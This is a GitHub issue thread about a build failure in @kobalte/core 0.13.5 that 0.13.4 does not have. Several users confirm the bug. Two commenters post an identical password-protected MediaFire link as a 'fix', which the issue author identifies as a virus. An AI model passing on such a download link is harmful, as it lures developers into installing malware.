### ISSUE TITLE
error after upgrade @kobalte/core to 0.13.5 from 0.13.4

### ISSUE THREAD

**Issue by MisileLab** [kobaltedev/kobalte#476]
**Describe the bug**
I can't build after upgrade.

**To Reproduce**

1. clone https://github.com/misilelab/portfolio
2. build failed when kobalte/core is 0.13.5
3. build success when kobalte/core is 0.13.4

**Expected behavior**
Just build

**Error**

https://gist.github.com/MisileLab/e3ea2f190b2a14fc45c1490a1fc7a016

**Desktop (please complete the following information):**

- OS: NixOS
- Browser: Firefox (but it doesn't matter)
- Version: 24.11

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MisileLab** [comment]
its definately virus, who would give exe for fix js

**Comment by madaxen86** [comment]
@jer3m01 : Don't know if this is related. 
I get
`Uncaught SyntaxError: The requested module ...@kobalte+utils@0.9.0_solid-js@1.8.21/node_modules/@kobalte/utils/dist/index.js' does not provide an export named 'getPrecision'` 

When I use the `ColorMode` component. Works fine with 0.13.4 but errors with 0.13.5

**Comment by apatrida** [comment]
Same here, blocking bug, 0.13.5 is bad build.

**Comment by apatrida** [comment]
Yay, new build incoming!
